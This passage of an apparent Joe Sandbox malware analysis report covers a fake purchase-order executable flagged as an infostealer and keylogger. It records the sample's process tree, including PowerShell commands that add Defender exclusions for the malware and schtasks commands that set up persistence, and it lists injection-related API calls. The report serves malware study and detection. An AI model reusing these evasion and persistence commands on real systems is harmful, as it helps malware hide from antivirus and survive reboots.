Start date:	10/01/2025
Path:	C:\Users\user\Desktop\PO#17971.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO#17971.exe"
Imagebase:	0x770000
File size:	685'568 bytes
MD5 hash:	7A01CE7B443E4C2F5344EF3EC0E21538
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2093507552.00000000070A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2086741217.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:03:36
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe"
Imagebase:	0x420000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:03:36
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:03:36
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TZRtlifudvO.exe"
Imagebase:	0x420000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:03:36
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:03:36
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp"
Imagebase:	0x820000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:03:37
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:03:37
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0x690000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4513884239.00000000072C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	09:03:38
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\TZRtlifudvO.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TZRtlifudvO.exe
Imagebase:	0x60000
File size:	685'568 bytes
MD5 hash:	7A01CE7B443E4C2F5344EF3EC0E21538
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2130210299.00000000024D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:03:40
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:03:42
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp"
Imagebase:	0x820000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:03:42
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:03:42
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0x690000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:03:42
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0x690000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:03:42
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0x690000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.3%
Total number of Nodes:	130
Total number of Limit Nodes:	7

Executed Functions

Function 07102528 Relevance: 6.9, Strings: 5, Instructions: 621
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 071045FB
Haq, xrefs: 07104685
Haq, xrefs: 07104574
Haq, xrefs: 071044E1
Haq, xrefs: 07104743

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID:
String ID: Haq$Haq$Haq$Haq$Haq
API String ID: 0-1792267638
Opcode ID: d6859feff08c4d38269b8845d4708c2c8574c209f3b8d7187f37ffa78e088f13
Instruction ID: 61ba95e63fb18684a4d9e0926cc062d00020de20d7f8eeb9b118a122f970c655
Opcode Fuzzy Hash: d6859feff08c4d38269b8845d4708c2c8574c209f3b8d7187f37ffa78e088f13
Instruction Fuzzy Hash: 1232A0B0A002548FDB14DFA9C8907AEBBF2BF89300F1085AAD509AB3D5DF749D45CB91

Function 070D869C Relevance: 1.7, Strings: 1, Instructions: 465COMMON

Download Yara Rule

Strings

Haq, xrefs: 070DDD0A

Memory Dump Source

Source File: 00000000.00000002.2093608085.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_PO#17971.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 24f9533f2c383bbb6f899de86627fd0498342ae4ea5b43ffb7973c75ca30f4f2
Instruction ID: 7ea7ac983ac61eda1e93fca0dd536fbe3706e2cfb3b1d9942b37fc9257b7570d
Opcode Fuzzy Hash: 24f9533f2c383bbb6f899de86627fd0498342ae4ea5b43ffb7973c75ca30f4f2
Instruction Fuzzy Hash: 5C02AF75A003599FCB14DFA9C854AEEBBF6FF89310F10859AE409AB351DB309D42CB91

Function 070D85DC Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093608085.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479a85e4cf73b913c1930cf8d05b0248ec08d12c5769c5a7681c27c9eaf80a8a
Instruction ID: 412e08181dfaf5b8ce2e423c22460d0fa0d74a051f446309ce2e985a31d57509
Opcode Fuzzy Hash: 479a85e4cf73b913c1930cf8d05b0248ec08d12c5769c5a7681c27c9eaf80a8a
Instruction Fuzzy Hash: 0EA22871E102198FCB15DBA8C9586DDB7B2FF89300F1086A9D90AA7351EF70AE95CF41

Function 0710251A Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4665f4cc7bb1b433a035b61f241c46d055cf163a37513c399ed580d5242825e3
Instruction ID: f2046efbbaf72a15562ca919808b8f6c3c5a3e5e2e0319625a666fb906a2923d
Opcode Fuzzy Hash: 4665f4cc7bb1b433a035b61f241c46d055cf163a37513c399ed580d5242825e3
Instruction Fuzzy Hash: 43C16CB1E002598FCF15DFA5C88079DBBB2BF85300F14C1AAD949AB295DBB0D985CF91

Function 07103F10 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f7bb99ea8959808d7ad4ccb4c0f584bdbd7a0ba80f943838d01a4fd9906a89
Instruction ID: 7b541594a1d35e6a70101488adf3aa1673635f55337f2eb62a918543cbedd7ad
Opcode Fuzzy Hash: d9f7bb99ea8959808d7ad4ccb4c0f584bdbd7a0ba80f943838d01a4fd9906a89
Instruction Fuzzy Hash: 47C16CB1E002598FCF15CFA5C88079DBBB2BF89300F14C5AAD949AB295DB70D985CF91

Function 02A27B08 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2086122600.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a20000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a1668f40a2e59a109c1fcbd6470bc923cc765ffce2db436f2e22717f83fdd48
Instruction ID: 274bf2a00a4d5b1ec77d7400f38e9624c13023be38e8a5e2d4d78ba4c2786981
Opcode Fuzzy Hash: 3a1668f40a2e59a109c1fcbd6470bc923cc765ffce2db436f2e22717f83fdd48
Instruction Fuzzy Hash: 49B11774E002598FCB05DFA9D894AEEBBF6FF89300F148469D818AB365DB306946CF50

Function 02A24204 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2086122600.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a20000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33dfb41448901c61ae5287a03653814ecc1b6e177585b1e181f4f4a1cf559f51
Instruction ID: 3b298fcd05a6f12400d9b25106c5f87f44c2c2925649b386a6810ed20a3ce267
Opcode Fuzzy Hash: 33dfb41448901c61ae5287a03653814ecc1b6e177585b1e181f4f4a1cf559f51
Instruction Fuzzy Hash: F7A19274E00219CFCB54DFA9D984AAEBBF6FF88300F108569D819AB365DB34A945CF50

Function 072445E3 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163fc43050d2e1697a7f423c42b21458cdb54e4d9a8261ab0cda482430fdee85
Instruction ID: 602894dabce00c39d506375cfd81c17cf1d2ba47d1c1fa3129b0874c82ffadeb
Opcode Fuzzy Hash: 163fc43050d2e1697a7f423c42b21458cdb54e4d9a8261ab0cda482430fdee85
Instruction Fuzzy Hash: 8721C2B1D106189BEB18CFABD8453DEFAF6AFC9300F14C16AD40876264DBB509468F90

Function 0724D9F3 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0176336222c5c26c0d50263b94567e00cce8635f2e6219a4d492005062c6e43a
Instruction ID: f4ce37ddaa6dc98d61c136b45bd8195be71174df0b949fd09d0ba5c3d7a53d10
Opcode Fuzzy Hash: 0176336222c5c26c0d50263b94567e00cce8635f2e6219a4d492005062c6e43a
Instruction Fuzzy Hash: 75E08CB4D78218CBCB08CF94E8810FCB7B8EB4B720F0220A5E00EA3222C6748885CE05

Function 02A2DDB8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02A2DE36
GetCurrentThread.KERNEL32 ref: 02A2DE73
GetCurrentProcess.KERNEL32 ref: 02A2DEB0
GetCurrentThreadId.KERNEL32 ref: 02A2DF09

Memory Dump Source

Source File: 00000000.00000002.2086122600.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a20000_PO#17971.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 095f5877985ac4b9c8e61856a831f06fea2d88807e89504de6e5dc6c91d54d9a
Instruction ID: a1ffc82d36512956fa6c6045211c703b0878dfe4647c60a18844f988d12c6915
Opcode Fuzzy Hash: 095f5877985ac4b9c8e61856a831f06fea2d88807e89504de6e5dc6c91d54d9a
Instruction Fuzzy Hash: BF5138B09007098FDB54DFA9D548BAEBBF5FF48314F208499E009A7350DB389945CF65

Function 0724A544 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0724A786

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7bd4b6357ad4792e635124d7bef2949bffcb041c1d1ecffee6f9abe1bcc4f70d
Instruction ID: 5996772527b5747cfaac21c1652bf4324a26ce3111d7a1260f1d257fe20555c9
Opcode Fuzzy Hash: 7bd4b6357ad4792e635124d7bef2949bffcb041c1d1ecffee6f9abe1bcc4f70d
Instruction Fuzzy Hash: CDA14AB1D5061ADFEF24CF68C8407EEBBB2BF48314F148569E808A7250DB759985CF91

Function 0724A550 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0724A786

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: eb8c3b8e8d4b08f158a0fd27d45e91aa85c088cacc60fb67681e9135eb1f88dc
Instruction ID: 31106ef2042e8acd0b00026e70d4c4175c79e2c64b440df7f6d4ab681cf3dd3b
Opcode Fuzzy Hash: eb8c3b8e8d4b08f158a0fd27d45e91aa85c088cacc60fb67681e9135eb1f88dc
Instruction Fuzzy Hash: 109149B1D5061ADFDF24CF68C8407AEBBB2FF48314F148169E808A7250DB759985CF92

Function 02A25D0D Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02A25DC9

Memory Dump Source

Source File: 00000000.00000002.2086122600.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a20000_PO#17971.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8c9a321b97af7f9e5cfa8247e75866e4c8433ad1aad5ee2bea0928f1f1eb36f0
Instruction ID: 69496c6daa708be5392f83c3e8c0bb1eaadf02b4b863466f6b12ac8fef568939
Opcode Fuzzy Hash: 8c9a321b97af7f9e5cfa8247e75866e4c8433ad1aad5ee2bea0928f1f1eb36f0
Instruction Fuzzy Hash: F641E2B0C00619CEDB24CFA9C884BDEBBF5BF49314F20805AD409AB255DB75694ACF51

Function 02A2454C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02A25DC9

Memory Dump Source

Source File: 00000000.00000002.2086122600.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a20000_PO#17971.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4945e107c2eb7a4e9e7761ea78780e55bbf84775c744d57c1e132722fa418ae0
Instruction ID: 2f314fe81a8b081d38c27c45a07001d73ca579016e735573fc675395f2c84f33
Opcode Fuzzy Hash: 4945e107c2eb7a4e9e7761ea78780e55bbf84775c744d57c1e132722fa418ae0
Instruction Fuzzy Hash: 154113B0C0071DCBDB28CFA9C884B9EBBF5BF48704F20805AD408AB254DB75594ACF90

Function 07104942 Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07104862,?,?,?,?,?), ref: 07104907

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 7d21eaf0c3322d3d4bad8187c003c69151a978529ceadfc53443771c9a3e1213
Instruction ID: c249f4abe93d83a2925c55ae9a702a8ff5c3690212818df5742da79f0377e1c9
Opcode Fuzzy Hash: 7d21eaf0c3322d3d4bad8187c003c69151a978529ceadfc53443771c9a3e1213
Instruction Fuzzy Hash: 6A315CB5500385CFDB21DF69D440BDEBBF5FF89300F14805AE549972A0C3749844CBA1

Function 07104848 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: b3bb4e2b5ef100713499b6c3f4eda65f049ab5317e47a10765533d4d29707239
Instruction ID: 02e97cb02934f5ffc4a87b070dffd7c99b59a9fc2624a84851a3443a0d6ef776
Opcode Fuzzy Hash: b3bb4e2b5ef100713499b6c3f4eda65f049ab5317e47a10765533d4d29707239
Instruction Fuzzy Hash: 33319C72904389DFCB12CFA9D844AEABFF8EF09310F14805AEA54A7261C3759950DFA1

Function 07249EC1 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07249F58

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dc0ea0d2cb3161f835907ae9c70d5e60615bbcafee02999acd400f7b08ec7e22
Instruction ID: 8c5692e9983981a5d9dccfe96ae730ae38d35ba2da4b1247709df8f7cead2b1c
Opcode Fuzzy Hash: dc0ea0d2cb3161f835907ae9c70d5e60615bbcafee02999acd400f7b08ec7e22
Instruction Fuzzy Hash: 4D2127B59003099FDB10CFA9C884BEEBBF5FF48310F10842AE559A7250C778A955CFA0

Function 07249EC8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07249F58

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2ccb2cdb7fd7e1b5cee9b44ead5be14b6b64cac81c9380a128f93d8971fbebad
Instruction ID: c6e675b2af1acc26bebf2ae784265fb1f25de3a1d2bbdf920f0f26aa01f39f66
Opcode Fuzzy Hash: 2ccb2cdb7fd7e1b5cee9b44ead5be14b6b64cac81c9380a128f93d8971fbebad
Instruction Fuzzy Hash: 5C214CB19003099FCB10DFA9C845BDEBBF5FF48310F10842AE559A7240C778A954CFA0

Function 07249FB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0724A038

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 17a8b1dac3ce3e5a08655c8e984cc7555f19088d133d8a5705819c6a931e4337
Instruction ID: 071347cedb973bcee6c9d3d7561a9f50db68ecd208e52967840a6a6a09edb74d
Opcode Fuzzy Hash: 17a8b1dac3ce3e5a08655c8e984cc7555f19088d133d8a5705819c6a931e4337
Instruction Fuzzy Hash: 0B2137B1C002499FDB10DFAAC985AEEFBF5FF48310F50842AE919A7250C7799941CFA1

Function 07249D29 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07249DAE

Memory Dump Source

